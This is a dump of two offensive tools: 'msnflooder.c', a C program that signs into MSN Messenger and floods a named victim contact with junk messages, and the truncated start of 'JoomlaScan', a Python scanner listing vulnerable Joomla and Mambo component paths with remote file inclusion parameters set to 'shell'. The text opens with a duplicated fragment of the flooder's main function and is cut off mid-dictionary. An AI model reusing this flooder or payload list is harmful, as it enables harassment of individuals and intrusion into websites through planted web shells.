msn_request (sd, type, server, "PRP 6 MFN SPAMMER\r\n", buff, buff_size); /* set new nick name */
#
msn_request (sd, type, server, "CHG 7 NLN 0 0\r\n", buff, buff_size); /* set online status */
#
msn_request (sd, type, server, "PRP 8 MFN MSN%20SHIT%20SHIT%20SHIT%20!!!\r\n", buff, buff_size); /* set new nick name */
#
sd_sb = init_msg (sd, "XFR 9 SB\r\n", xfr_sb_server, sizeof (xfr_sb_server) - 1, &port, id_sb, account, victim);
#
send_msg (sd_sb, force_flood);
#
close (sd_sb);
#
#
snprintf (request, buff_size, "PRP 12 MFN %s\r\n", (rnick == NULL) ? account : rnick);
#
msn_request (sd, type, server, request, buff, buff_size); /* restore nick name */
#
msn_request (sd, type, server, "OUT\r\n", buff, buff_size); /* quit */
#
close (sd);
#
#
fprintf (stdout, "\n\n Finish ! :-))\n\n");
#
#
return 0;
#
}
/***************************************************************************
#
* Copyright (C) 2007 by Dani (Rebootz, Jeet99 ecc... :-P) *
#
* cradle.dani|at|gmail.com *
#
* *
#
* This program is free software; you can redistribute it and/or modify *
#
* it under the terms of the GNU General Public License as published by *
#
* the Free Software Foundation; either version 2 of the License, or *
#
* any later version. *
#
* *
#
* This program is distributed in the hope that it will be useful, *
#
* but WITHOUT ANY WARRANTY; without even the implied warranty of *
#
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
#
* GNU General Public License for more details. *
#
* *
#
* Compiling: $ gcc -Wall msnflooder.c -o msnflooder -lssl *
#
* Usage: $ ./msnflooder -f -a victim@hotmail.com -r nickname *
#
* *
#
* [Victim must be in your contact list AND connected !] *
#
* *
#
***************************************************************************/
#
#
#include
#
#include
#
#include
#
#include
#
#define SIGINT 2
#
#
int isalnum (int c);
#
int close(int fd);
#
void _exit(int status);
#
char *getpass (const char* prompt);
#
#
int kill(pid_t pid, int sig);
#
pid_t wait (int* status);
#
#
#
BIO *bio_err = 0;
#
#
/* usage */
#
#
void usage (char* prgname)
#
{
#
fprintf (stdout, "\n"
#
"Usage: %s -a
#
"Victim must be in your contacts list and connected !\n\n"
#
"-a option set victim\n"
#
"-f option flood forever\n"
#
"-r option restore a nick name\n\n",
#
prgname);
#
_exit (2);
#
}
#
#
/* print an error to stderr and quit */
#
#
void _error (char* msg)
#
{
#
fprintf (stderr, "%s\n", msg);
#
_exit (-1);
#
}
#
#
/* receive other data */
#
#
void clean_sock (int sd)
#
{
#
char buff[1024];
#
int rval;
#
fd_set read_set;
#
struct timeval timeout;
#
#
FD_ZERO (&read_set);
#
#
while (1)
#
{
#
FD_SET (sd, &read_set);
#
timeout.tv_sec = 3;
#
timeout.tv_usec = 0;
#
rval = select (sd+1, &read_set, NULL, NULL, &timeout);
#
#
if (rval < 0)
#
_error ("select call failed.");
#
else if (!rval)
#
break;
#
else
#
recv (sd, buff, sizeof buff - 1, 0);
#
}
#
return ;
#
}
#
#
/* verify a valid email address */
#
#
int verify_mail (char* account)
#
{
#
char* ptr;
#
unsigned short int l;
#
#
l = strlen (account);
#
#
if (l > 200)
#
_error ("WHAT ?!");
#
#
if ((ptr = strchr (account, '@')) == NULL || strchr (ptr, '.') == NULL)
#
return 1;
#
#
return 0;
#
}
#
#
/* read your account and password */
#
#
int get_data (char* account, char* pass, unsigned short size)
#
{
#
int set;
#
char* tmp;
#
#
fprintf (stdout, "Your account: ");
#
fflush (stdout);
#
fgets (account, size, stdin);
#
set = strlen (account) - 1;
#
* (account + set) = 0;
#
#
if (verify_mail (account))
#
{
#
fprintf (stderr, "\"%s\" isn't a valid email address.\n", account);
#
_exit (-1);
#
}
#
#
fprintf (stdout, "Your password: ");
#
fflush (stdout);
#
tmp = getpass ("");
#
if (strlen (tmp) > size - 1)
#
_error ("Password too long !?");
#
strcpy (pass, tmp);
#
#
return 0;
#
}
#
#
/* "encode" password; change only alphanumeric char in hex :D */
#
#
char* str_encode (char* str)
#
{
#
char* ret;
#
unsigned short len = strlen (str),
#
size = (len * 2 * sizeof (char)) + 1,
#
x, y;
#
#
if ((ret = (char*) malloc (size)) == NULL)
#
_error ("Cannot allocate memory.");
#
#
memset (ret, 0, size);
#
#
for (x=0, y=0; x
if (!isalnum (str[x]))
#
{
#
sprintf(&ret[y], "%%%x", str[x]);
#
y += 2;
#
} else
#
ret[y] = str[x];
#
#
return ret;
#
}
#
#
/* resolve a hostname, save type and length of address in
#
* 'type' and 'length' and return ip */
#
#
char* resolve (int* type, int* length, char* host)
#
{
#
struct hostent* name;
#
char buffer[1024];
#
#
if ((name = gethostbyname (host)) == NULL)
#
{
#
snprintf (buffer, sizeof buffer -1, "Cannot resolve %s.", host);
#
_error (buffer);
#
}
#
#
*type = name->h_addrtype;
#
*length = name->h_length;
#
return (char*) *name->h_addr_list;
#
}
#
#
/* initialize ssl */
#
#
SSL_CTX * initialize_ctx (void)
#
{
#
SSL_METHOD* method;
#
SSL_CTX* ctx;
#
#
if (!bio_err)
#
{
#
SSL_library_init ();
#
SSL_load_error_strings ();
#
bio_err = BIO_new_fp (stderr, BIO_NOCLOSE);
#
}
#
method = TLSv1_client_method ();
#
ctx = SSL_CTX_new (method);
#
#
return ctx;
#
}
#
#
/* connect to IP, request data and save result to 'buff' */
#
#
char* _ssl_connect ( char *request, /* request page */
#
int type, /* type of address */
#
int length, /* server length */
#
char* server, /* IP server */
#
unsigned short port, /* port to connect */
#
char *buff, /* saved received data */
#
unsigned short size) /* max size received data */
#
{
#
SSL_CTX* ctx;
#
SSL* ssl;
#
BIO* sbio;
#
struct sockaddr_in server_in;
#
int sock;
#
#
ctx = initialize_ctx();
#
#
server_in.sin_family = type;
#
server_in.sin_port = htons (port);
#
memcpy ((char*) &server_in.sin_addr.s_addr, server, length);
#
#
if ((sock = socket (AF_INET, SOCK_STREAM, 0)) < 0)
#
_error ("Cannot create socket.");
#
#
if ((connect (sock, (struct sockaddr*) &server_in, sizeof server_in)) < 0)
#
_error ("Cannot connect to host.");
#
#
ssl = SSL_new (ctx);
#
sbio = BIO_new_socket (sock, BIO_NOCLOSE);
#
SSL_set_bio (ssl, sbio, sbio);
#
snprintf (buff, size, request);
#
#
if (SSL_connect (ssl) <= 0)
#
_error ("Cannot connect to SSL server.");
#
if (SSL_write (ssl, buff, strlen(buff)) < 1)
#
_error ("Cannot send SSL data.");
#
memset (buff, 0, size);
#
if (SSL_read (ssl, buff, size) <= 0)
#
_error ("Cannot receive SSL data.");
#
if (SSL_shutdown (ssl) < 0)
#
_error ("Cannot shutdown SSL connection.");
#
#
SSL_free (ssl);
#
SSL_CTX_free (ctx);
#
close (sock);
#
#
return buff;
#
#
}
#
#
/* resolve a name and send ssl request to it. If received data NOT start with
#
'assertion', print error_message to stderr and quit ! */
#
#
int _ssl_request (int* type, int* length, char* host, int port, char* request, char* buff, unsigned short size,
#
char* assertion, char* error_message)
#
{
#
char* server;
#
char buffer[1024];
#
#
if ((inet_ntop (*type, host, buffer, sizeof buffer - 1)) != NULL)
#
{
#
fprintf (stdout, "Connecting to %s and send request...", buffer);
#
fflush (stdout);
#
}
#
#
#
server = resolve (type, length, host); /* type and length here will be modied */
#
_ssl_connect (request, *type, *length, server, port, buff, size);
#
#
if (assertion != (char*) NULL && strncmp (buff, assertion, strlen (assertion)) != 0)
#
_error (error_message);
#
#
fprintf (stdout, "OK\n");
#
#
return 0;
#
}
#
#
/* connect to msn server and return a socket descriptor; socket NO close ;) */
#
#
int msn_connect (char* server, unsigned short port, int family, int length)
#
{
#
#
struct sockaddr_in sock;
#
int sd;
#
char buffer[2][1024];
#
#
if (inet_ntop (family, server, buffer[0], sizeof buffer[0] - 1) != NULL)
#
fprintf (stdout, "Connecting to %s at port %u...", buffer[0], port);
#
#
fflush (stdout);
#
#
sock.sin_family = family;
#
sock.sin_port = htons (port);
#
memcpy ((char*) &sock.sin_addr.s_addr, server, length);
#
#
if ((sd = socket (family, SOCK_STREAM, 0)) < 0)
#
_error ("Cannot create socket.");
#
#
if (connect (sd, (struct sockaddr*) &sock, sizeof sock) < 0)
#
{
#
if (*buffer == (char*) NULL)
#
_error ("Cannot connect to server.");
#
else
#
{
#
snprintf (buffer[1], sizeof buffer[1] - 1, "Cannot connect to %s.", buffer[0]);
#
_error (buffer[1]);
#
}
#
}
#
#
printf ("OK.\n");
#
return sd;
#
}
#
#
/* send dato to a server, save result on 'buff' without "\r\n"; socket (sd) is ALREADY connect
#
if request is null JUST receive data */
#
#
int msn_request (int sd, int family, char* server,
#
char* request, char* buff, unsigned short size)
#
{
#
char *set, buffer[2][512];
#
int read = 0;
#
#
memset (buff, 0, size);
#
#
if (request != (char*) NULL)
#
if ((send (sd, request, strlen (request), 0)) < 0)
#
{
#
inet_ntop (family, server, buffer[1], sizeof buffer[1] - 1);
#
snprintf (buffer[0], sizeof buffer[0] - 1, "Cannot send request to %s.", buffer[1]);
#
_error (buffer[0]);
#
}
#
#
if ((read = recv (sd, buff, size, 0)) < 0)
#
{
#
inet_ntop (family, server, buffer[1], sizeof buffer[1] - 1);
#
snprintf (buffer[0], sizeof buffer[0] - 1, "Cannot receive data from %s.", buffer[1]);
#
_error (buffer[0]);
#
}
#
#
buff[read] = 0;
#
if ((set = strrchr (buff, '\r')) != NULL)
#
*set = 0;
#
#
return 0;
#
}
#
#
/* call msn_request() and initialize login */
#
#
int msn_start (int sd, int type, char* server, char* account, char* buff, unsigned short buff_size)
#
{
#
#
char request[buff_size];
#
#
snprintf (request, buff_size, "VER 1 MSNP11 CVR0\r\n");
#
msn_request (sd, type, server, request, buff, buff_size);
#
snprintf (request, buff_size, "CVR 2 0x0409 win 4.10 i386 MSNMSGR 5.0.0544 MSMSGS %s\r\n", account);
#
msn_request (sd, type, server, request, buff, buff_size);
#
snprintf (request, buff_size, "USR 3 TWN I %s\r\n", account);
#
msn_request (sd, type, server, request, buff, buff_size);
#
#
return 0;
#
}
#
#
/* get from received data (data) new server ip end port. Save it in 'redirect' and 'port' */
#
#
int xfr_redirect (char* data, char* redirect, unsigned short size, unsigned short* port)
#
{
#
char *set, *cut;
#
#
if (strncmp (data, "XFR", 3) != 0 || (set = strstr (data, "NS ")) == NULL)
#
_error ("Cannot get server to redirect.");
#
set += 3; /* delete 'NS ' */
#
#
if ((cut = strchr (set, ' ')) == NULL)
#
_error ("Cannot get server to redirect.");
#
*cut = 0; /* delete end of string */
#
#
if ((cut = strchr (set, ':')) == NULL)
#
_error ("Cannot get server to redirect.");
#
*cut = 0; /* split host and port */
#
#
if (strlen (set) > size)
#
_error ("Server too big !?");
#
#
memcpy (redirect, set, size); /* copy ip of new server */
#
*port = (unsigned short) atoi (++cut); /* save new port */
#
#
fprintf (stdout, "New server received.\n Ip: %s\n Port: %u\n", redirect, *port);
#
#
return 0;
#
}
#
#
/* save id from USR message notification server...
#
MOST IMPORTANT this is required in TWINER authentication !!! */
#
#
int save_id (char* buff, char* id, unsigned short idsize)
#
{
#
char* ptr;
#
#
if ((ptr = strstr (buff, "lc=")) == NULL)
#
_error ("Cannot get id.");
#
if (strlen (ptr) > idsize)
#
_error ("ID too big !?");
#
#
strcpy (id, ptr);
#
#
return 0;
#
#
}
#
#
/* get host and page from NEXUS data in 'data'; page will save in 'page', IP server will save in host ! */
#
#
int nexus_redirect (char* buff, char* host, char* page, unsigned short sizes)
#
{
#
char *ptr, *set;
#
unsigned short size = sizes / 2;
#
#
if ((ptr = strstr (buff, "DALogin=")) == NULL || (set = strchr (ptr, '=')) == NULL)
#
_error ("Cannot get DALogin field.");
#
#
ptr = ++set ; /* delete 'DALogin=' */
#
#
if ((set = strchr (ptr, '/')) == NULL)
#
_error ("Cannot get hostname from NEXUS received data.");
#
#
*set = 0;
#
strncpy (host, ptr, size); /* save host */
#
#
set++;
#
ptr = set;
#
if ((set = strchr (ptr, ',')) == NULL)
#
_error ("Cannot get page from NEXUS received data.");
#
*set = 0;
#
#
strncpy (page, ptr, size);
#
#
fprintf (stdout, "New Host and Page obtained from NEXUS server.\n Server: %s\n Page: %s\n", host, page);
#
#
return 0;
#
}
#
#
/* get ticket from ssl server reply and save it in 'ticket' */
#
#
int save_ticket (char* reply, char* ticket, unsigned short ticket_size)
#
{
#
char* ptr, *t;
#
#
if ((ptr = strstr (reply, "Authentication-Info:")) == NULL || (t = strchr (ptr, '\'')) == NULL)
#
_error ("Cannot get passport ticket.");
#
#
ptr = ++t; /* delete ' char firts 't=' */
#
if ((t = strchr (ptr, '\'')) != NULL) /* cut ticket and replace with 0 */
#
*t = 0;
#
else
#
_error ("Unexpected error !");
#
#
if (strlen (ptr) > ticket_size)
#
_error ("Ticket too long !?");
#
#
snprintf (ticket, ticket_size, "%s\r\n", ptr);
#
#
fprintf (stdout, "OK, ticket received and saved.\n");
#
#
return 0;
#
}
#
#
/* authentication with TWINER */
#
#
int usr_receive (int sd, char* req, char* ticket, char* buff, unsigned short size, char* assertion)
#
{
#
int l, rval;
#
char *request;
#
#
memset (buff, 0, size);
#
#
l = strlen (req) + strlen (ticket) + 2;
#
if ((request = (char*) malloc (l * sizeof (char))) == NULL)
#
_error ("Cannot allocate memory for TWINER authentication send data.");
#
#
sprintf (request, "%s %s", req, ticket);
#
#
rval = send (sd, request, strlen (request), 0);
#
if (rval < 0)
#
_error ("Cannot send data !?");
#
#
if ((rval = recv (sd, buff, size - 1, 0)) < 0)
#
_error ("Cannot receive data !?");
#
#
buff[rval] = 0;
#
#
if (strncmp (buff, assertion, strlen (assertion)) != 0)
#
_error ("Login failed.");
#
#
fprintf (stdout, "Login successfull.\n");
#
#
free (request);
#
request = NULL;
#
clean_sock (sd);
#
return 0;
#
}
#
#
/* syncronize with server and receive contacts list...We will ignore all... */
#
#
int syn_receive (int sd, char* request)
#
{
#
int rval;
#
char buff[2048];
#
fd_set read_set;
#
struct timeval timeout;
#
#
printf ("Syncronizing with server...");
#
fflush (stdout);
#
#
if (send (sd, request, strlen (request), 0) < 0)
#
{
#
printf ("Failed.\n");
#
_exit (-1);
#
}
#
#
FD_ZERO (&read_set);
#
#
while (1)
#
{
#
FD_SET (sd, &read_set);
#
timeout.tv_sec = 3;
#
timeout.tv_usec = 0;
#
rval = select (sd + 1, &read_set, NULL, NULL, &timeout);
#
#
if (rval < 0)
#
_error ("select() call failed.");
#
else if (!rval)
#
break;
#
else
#
recv (sd, buff, 2048, 0);
#
}
#
printf ("OK.\n");
#
return 0;
#
}
#
#
/* prepare to flood */
#
#
int init_msg (int sd, char* req, char* new_server, unsigned short server_size, unsigned short* port,
#
char* id, char* account, char* victim)
#
{
#
int sd_sb, read, type, length, size=2048;
#
char buff[size], *ptr, *set, *server, request[size];
#
#
clean_sock (sd);
#
#
if (send (sd, req, strlen (req), 0) < 0)
#
_error ("Cannot send request to start flood :-(");
#
#
fprintf (stdout, "\nInitialize flood...\n");
#
#
if ((read = recv (sd, buff, sizeof buff - 1, 0)) < 0)
#
_error ("Cannot receive data.");
#
#
buff[read] = 0;
#
#
/* read new server port and id */
#
#
if ((ptr = strstr (buff, "XFR 9 SB ")) == NULL || (set = strchr (ptr, ':')) == NULL)
#
_error ("Cannot read new server.");
#
ptr += strlen ("XFR 9 SB ");
#
*set = 0;
#
strncpy (new_server, ptr, server_size);
#
#
ptr = ++set;
#
if ((set = strchr (ptr, ' ')) == NULL)
#
_error ("Cannot read new port.");
#
*set = 0;
#
*port = atoi (ptr);
#
#
ptr = ++set;
#
if ((set = strstr (ptr, "CKI ")) == NULL)
#
_error ("Cannot get id from XFR SB.");
#
ptr = set + strlen ("CKI ");
#
if ((set = strchr (ptr, '\n')) == NULL)
#
_error ("Cannot get id from XFR SB.");
#
set++;
#
*set = 0; /* set NULL char after "\r\n" */
#
if (strlen (ptr) > size)
#
_error ("Data from XFR SB too long !?");
#
strcpy (id, ptr);
#
#
server = resolve (&type, &length, new_server);
#
sd_sb = msn_connect (server, *port, type, length);
#
#
snprintf (request, size, "USR 8 %s %s", account, id);
#
msn_request (sd_sb, type, server, request, buff, size);
#
if (strncmp (buff, "USR 8 OK", 8) != 0)
#
_error ("Unexpected error. Try again please !");
#
#
fprintf (stdout, "Calling %s...", victim);
#
fflush (stdout);
#
#
snprintf (request, size, "CAL 10 %s\r\n", victim);
#
msn_request (sd_sb, type, server, request, buff, size);
#
if (strncmp (buff, "CAL 10 RINGING", 13) != 0)
#
{
#
if (!strncmp (buff, "217", 3))
#
{
#
snprintf (buff, sizeof buff - 1, "Failed.\nContacts \"%s\" don't exist in your contacts list or is offline/hide.\n", victim);
#
_error (buff);
#
}
#
else
#
{
#
snprintf (buff, sizeof buff - 1, "Failed.\nContacts \"%s\" is invalid !?.\n", victim);
#
_error (buff);
#
}
#
}
#
#
puts ("OK.");
#
msn_request (sd_sb, type, server, NULL, buff, size); /* receive only other data... */
#
if (strncmp (buff, "JOI", 3) != 0)
#
_error ("JOI command not received !?");
#
#
return sd_sb; /* return socket descriptor */
#
}
#
#
int send_msg (int sd_sb, unsigned short force)
#
{
#
static const char header[] = "MIME-Version: 1.0\r\n"
#
"Content-Type: text/plain; charset=UTF-8\r\n"
#
"X-MMS-IM-Format: FN=Arial; EF=I; CO=0; CS=0; PF=22\r\n"
#
"\r\n";
#
#
char tmp[1003];
#
char msg[1500];
#
char *set;
#
unsigned cnt, len;
#
pid_t pid;
#
#
memset (msg, 0, sizeof msg);
#
#
fprintf (stdout, "\nFlooding%s...", (!force) ? "" : ", press Enter for stop");
#
fflush (stdout);
#
#
cnt = 0;
#
len = sizeof (tmp) - 3;
#
memset (tmp, 0, len);
#
#
while (cnt < len)
#
{
#
strcat (tmp, "\r\n");
#
cnt += 2;
#
}
#
set = strrchr (tmp, '\r');
#
if (set) *set = 0;
#
strcat (tmp, "\r\n");
#
len = strlen (header) + strlen (tmp);
#
#
sprintf (msg, "MSG 11 N %d\r\n"
#
"%s%s", len, header, tmp);
#
#
cnt = 0;
#
pid = fork();
#
#
if (pid < 0)
#
_error ("Unexpected error.");
#
else if (!pid)
#
{
#
while (cnt < 1500)
#
{
#
if (send (sd_sb, msg, strlen (msg), 0) < 0)
#
_error ("Cannot send message.");
#
if (!force) /* if 'force' parameter is true flood forever... */
#
cnt++;
#
}
#
_exit (0);
#
}
#
else
#
{
#
if (force)
#
{
#
int c;
#
while (1)
#
if ((c = getchar()) == '\n')
#
{
#
fprintf (stdout, "Stopping flood...");
#
fflush (stdout);
#
if (kill (pid, SIGINT) < 0)
#
_error ("Cannot kill child.");
#
else
#
break;
#
}
#
}
#
else
#
wait (0);
#
}
#
#
puts ("OK");
#
return 0;
#
}
#
#
int login_redirection ( char* server, char* page, char* buff, unsigned short size,
#
int* type, int* length, char* request)
#
{
#
char *set, *off;
#
#
fprintf (stdout, "Redirected to another server.\n");
#
#
if ((set = strstr (buff, "Location: ")) == NULL)
#
_error ("Cannot get new server.");
#
#
set += strlen ("Location: ");
#
#
if ((off = strchr (set, '/')) == NULL)
#
_error ("Cannot get new server.");
#
#
while (*off == '/') off++;
#
set = off;
#
#
if ((off = strchr (set, '/')) == NULL)
#
_error ("Cannot get new page.");
#
#
*off = 0;
#
off++;
#
#
strncpy (server, set, 512); /* 512 is size of server and page */
#
#
set = off;
#
if ((off = strchr (set, '\r')) != NULL)
#
*off = 0;
#
#
strncpy (page, set, 512); /* 512 is size of server and page */
#
#
fprintf (stdout, " Server: %s\n Page: %s\n", server, page);
#
#
_ssl_request ( type, length, server, 443, request,
#
buff, size, (char*) NULL, "Unauthorized.");
#
#
if (strncmp (buff, "HTTP/1.1 200 OK", 15))
#
{
#
puts ("\nPlease report this Error:\n");
#
_error (buff);
#
}
#
#
return 0;
#
}
#
#
int main (int argc, char** argv){
#
#
int sd, sd_sb, type, length;
#
unsigned short buff_size = 4096, port = 0, force_flood = 0;
#
char c, *server=NULL,
#
account[200], pass[200], *e_pass=NULL, *victim=NULL,
#
buff[buff_size], id[buff_size], id_sb[buff_size], nexus_redir[2][512], request[buff_size], ticket[buff_size],
#
xfr_server[50], xfr_sb_server[50], *rnick;
#
#
if (argc < 3 || argc > 6) usage (*argv);
#
#
while ((c = getopt (argc, argv, "a:r:fh")) != -1)
#
{
#
switch (c)
#
{
#
case 'a': victim = strdup (optarg);
#
if (victim == NULL) _error ("Cannot allocate memory.");
#
break;
#
case 'f': force_flood = 1;
#
break;
#
case 'h': usage (*argv);
#
break;
#
case 'r': rnick = strdup (optarg);
#
if (rnick == NULL) _error ("Cannot allocate memory.");
#
break;
#
case '?':
#
if (optopt == 'a' || optopt == 'r')
#
{
#
fprintf (stderr, "\nOption -%c requires an argument.\n"
#
"See %s -h\n\n", optopt, *argv);
#
exit (2);
#
}
#
else
#
{
#
fprintf (stderr, "\nUnknow -%c option.\n"
#
"See %s -h\n\n", optopt, *argv);
#
exit (2);
#
}
#
}
#
}
#
#
if (!victim) usage (*argv);
#
#
get_data (account, pass, 200);
#
putchar ('\n');
#
server = resolve (&type, &length, "messenger.hotmail.com");
#
sd = msn_connect (server, 1863, type, length);
#
msn_start (sd, type, server, account, buff, buff_size);
#
close (sd); /* close connection */
#
fprintf (stdout, "Connection close.\n");
#
xfr_redirect (buff, xfr_server, sizeof (xfr_server) - 1, &port); /* get new server and port */
#
server = resolve (&type, &length, xfr_server);
#
sd = msn_connect (server, 1863, type, length); /* connecting to new server */
#
msn_start (sd, type, server, account, buff, buff_size);
#
#
save_id (buff, id, buff_size); /* save id required by nexus authentication */
#
e_pass = str_encode (pass);
#
#
fprintf (stdout, "Incoming TWEENER Authentication.\n");
#
#
_ssl_request (&type, &length, "nexus.passport.com", 443,
#
"GET /rdr/pprdr.asp HTTP/1.0\r\n\r\n",
#
buff, buff_size,
#
"HTTP/1.1 200 OK", "Bad NEXUS reply.");
#
#
nexus_redirect (buff, nexus_redir[0], nexus_redir[1], sizeof (nexus_redir) - 1);
#
#
snprintf (request, buff_size,
#
"GET /%s HTTP/1.1\r\n"
#
"Authorization: Passport1.4 OrgVerb=GET,"
#
"OrgURL=http%%3A%%2F%%2Fmessenger%%2Emsn%%2Ecom,"
#
"sign-in=%s,pwd=%s,%s"
#
"User-Agent: MSMSGS\r\n"
#
"Host: %s\r\n"
#
"Connection: Keep-Alive\r\n"
#
"Cache-Control: no-cache\r\n\r\n",
#
nexus_redir[1], account, e_pass, id, nexus_redir[0]);
#
#
_ssl_request ( &type, &length, nexus_redir[0], 443, request,
#
buff, buff_size, (char*) NULL, "Unauthorized.");
#
#
if (!strncmp (buff, "HTTP/1.1 200 OK", 15))
#
;
#
else if (!strncmp (buff, "HTTP/1.1 302 Found", 18)) /* redirection... */
#
login_redirection ( nexus_redir[0], nexus_redir[1], buff, buff_size,
#
&type, &length, request);
#
else
#
_error ("\nUnauthorized.\n");
#
#
save_ticket (buff, ticket, sizeof ticket - 1);
#
usr_receive (sd, "USR 4 TWN S", ticket, buff, buff_size, "USR 4 OK");
#
syn_receive (sd, "SYN 5 0 0\r\n");
#
msn_request (sd, type, server, "PRP 6 MFN SPAMMER\r\n", buff, buff_size); /* set new nick name */
#
msn_request (sd, type, server, "CHG 7 NLN 0 0\r\n", buff, buff_size); /* set online status */
#
msn_request (sd, type, server, "PRP 8 MFN MSN%20SHIT%20SHIT%20SHIT%20!!!\r\n", buff, buff_size); /* set new nick name */
#
sd_sb = init_msg (sd, "XFR 9 SB\r\n", xfr_sb_server, sizeof (xfr_sb_server) - 1, &port, id_sb, account, victim);
#
send_msg (sd_sb, force_flood);
#
close (sd_sb);
#
#
snprintf (request, buff_size, "PRP 12 MFN %s\r\n", (rnick == NULL) ? account : rnick);
#
msn_request (sd, type, server, request, buff, buff_size); /* restore nick name */
#
msn_request (sd, type, server, "OUT\r\n", buff, buff_size); /* quit */
#
close (sd);
#
#
fprintf (stdout, "\n\n Finish ! :-))\n\n");
#
#
return 0;
#
}
JoomlaScan
#!/usr/bin/env python
import httplib,time,socket
import threading, Queue
class NoResultsPending(Exception):
"""All work requests have been processed."""
pass
class NoWorkersAvailable(Exception):
"""No worker threads available to process remaining requests."""
pass
class WorkerThread(threading.Thread):
"""Background thread connected to the requests/results queues.
A worker thread sits in the background and picks up work requests from
one queue and puts the results in another until it is dismissed.
"""
def __init__(self, requestsQueue, resultsQueue, **kwds):
"""Set up thread in damonic mode and start it immediatedly.
requestsQueue and resultQueue are instances of Queue.Queue passed
by the ThreadPool class when it creates a new worker thread.
"""
threading.Thread.__init__(self, **kwds)
self.setDaemon(1)
self.workRequestQueue = requestsQueue
self.resultQueue = resultsQueue
self._dismissed = threading.Event()
self.start()
def run(self):
"""Repeatedly process the job queue until told to exit.
"""
while not self._dismissed.isSet():
# thread blocks here, if queue empty
request = self.workRequestQueue.get()
if self._dismissed.isSet():
# return the work request we just picked up
self.workRequestQueue.put(request)
break # and exit
# XXX catch exceptions here and stick them to request object
self.resultQueue.put(
(request, request.callable(*request.args, **request.kwds))
)
def dismiss(self):
"""Sets a flag to tell the thread to exit when done with current job.
"""
self._dismissed.set()
class WorkRequest:
"""A request to execute a callable for putting in the request queue later.
See the module function makeRequests() for the common case
where you want to build several work requests for the same callable
but different arguments for each call.
"""
def __init__(self, callable, args=None, kwds=None, requestID=None,
callback=None):
"""A work request consists of the a callable to be executed by a
worker thread, a list of positional arguments, a dictionary
of keyword arguments.
A callback function can be specified, that is called when the results
of the request are picked up from the result queue. It must accept
two arguments, the request object and it's results in that order.
If you want to pass additional information to the callback, just stick
it on the request object.
requestID, if given, must be hashable as it is used by the ThreadPool
class to store the results of that work request in a dictionary.
It defaults to the return value of id(self).
"""
if requestID is None:
self.requestID = id(self)
else:
self.requestID = requestID
self.callback = callback
self.callable = callable
self.args = args or []
self.kwds = kwds or {}
class ThreadPool:
"""A thread pool, distributing work requests and collecting results.
See the module doctring for more information.
"""
def __init__(self, num_workers, q_size=0):
"""Set up the thread pool and start num_workers worker threads.
num_workers is the number of worker threads to start initialy.
If q_size > 0 the size of the work request is limited and the
thread pool blocks when queue is full and it tries to put more
work requests in it.
"""
self.requestsQueue = Queue.Queue(q_size)
self.resultsQueue = Queue.Queue()
self.workers = []
self.workRequests = {}
self.createWorkers(num_workers)
def createWorkers(self, num_workers):
"""Add num_workers worker threads to the pool."""
for i in range(num_workers):
self.workers.append(WorkerThread(self.requestsQueue,
self.resultsQueue))
def dismissWorkers(self, num_workers):
"""Tell num_workers worker threads to to quit when they're done."""
for i in range(min(num_workers, len(self.workers))):
worker = self.workers.pop()
worker.dismiss()
def putRequest(self, request):
"""Put work request into work queue and save for later."""
self.requestsQueue.put(request)
self.workRequests[request.requestID] = request
def poll(self, block=False):
"""Process any new results in the queue."""
while 1:
try:
# still results pending?
if not self.workRequests:
raise NoResultsPending
# are there still workers to process remaining requests?
elif block and not self.workers:
raise NoWorkersAvailable
# get back next results
request, result = self.resultsQueue.get(block=block)
# and hand them to the callback, if any
if request.callback:
request.callback(request, result)
del self.workRequests[request.requestID]
except Queue.Empty:
break
def wait(self):
"""Wait for results, blocking until all have arrived."""
while 1:
try:
self.poll(True)
except NoResultsPending:
break
def makeRequests(callable, args_list, callback=None):
"""Convenience function for building several work requests for the same
callable with different arguments for each call.
args_list contains the parameters for each invocation of callable.
Each item in 'argslist' should be either a 2-item tuple of the list of
positional arguments and a dictionary of keyword arguments or a single,
non-tuple argument.
callback is called when the results arrive in the result queue.
"""
requests = []
for item in args_list.items():
if item == isinstance(item, tuple):
requests.append(
WorkRequest(callable, item[0], item[1], callback=callback))
else:
requests.append(
WorkRequest(callable, [item], None, callback=callback))
return requests
paths = {"components/com_flyspray/startdown.php" : "startdown.php?file=shell",
"administrator/components/com_admin/admin.admin.html.php" : "admin.admin.html.php?mosConfig_absolute_path=shell",
"components/com_simpleboard/file_upload.php" : "file_upload.php?sbp=shell",
"components/com_hashcash/server.php" : "server.php?mosConfig_absolute_path=shell",
"components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php" : "config.inc.php?mosConfig_absolute_path=shell",
"components/com_sitemap/sitemap.xml.php" : "sitemap.xml.php?mosConfig_absolute_path=shell ",
"components/com_performs/performs.php" : "performs.php?mosConfig_absolute_path=shell",
"components/com_forum/download.php" : "download.php?phpbb_root_path=shell",
"components/com_pccookbook/pccookbook.php" : "pccookbook.php?mosConfig_absolute_path=shell",
"components/com_extcalendar/extcalendar.php" : "extcalendar.php?mosConfig_absolute_path=shell",
"components/minibb/index.php" : "index.php?absolute_path=shell",
"components/com_smf/smf.php" : "smf.php?mosConfig_absolute_path=",
"modules/mod_calendar.php" : "mod_calendar.php?absolute_path=shell ",
"components/com_pollxt/conf.pollxt.php" : "conf.pollxt.php?mosConfig_absolute_path=shell ",
"components/com_loudmounth/includes/abbc/abbc.class.php" : "abbc.class.php?mosConfig_absolute_path=shell",
"components/com_videodb/core/videodb.class.xml.php" : "videodb.class.xml.php?mosConfig_absolute_path=shell",
"components/com_pcchess/include.pcchess.php" : "include.pcchess.php?mosConfig_absolute_path=shell",
"administrator/components/com_multibanners/extadminmenus.class.php" : "extadminmenus.class.php?mosConfig_absolute_path=shell",
"administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php" : "admin.a6mambohelpdesk.php?mosConfig_live_site=shell",
"administrator/components/com_colophon/admin.colophon.php" : "admin.colophon.php?mosConfig_absolute_path=shell",
"administrator/components/com_mgm/help.mgm.php" : "help.mgm.php?mosConfig_absolute_path=shell",
"components/com_mambatstaff/mambatstaff.php" : "mambatstaff.php?mosConfig_absolute_path=shell",
"components/com_securityimages/configinsert.php" : "configinsert.php?mosConfig_absolute_path=shell",
"components/com_securityimages/lang.php" : "lang.php?mosConfig_absolute_path=shell",
"components/com_artlinks/artlinks.dispnew.php" : "artlinks.dispnew.php?mosConfig_absolute_path=shell",
"components/com_galleria/galleria.html.php" : "galleria.html.php?mosConfig_absolute_path=shell",
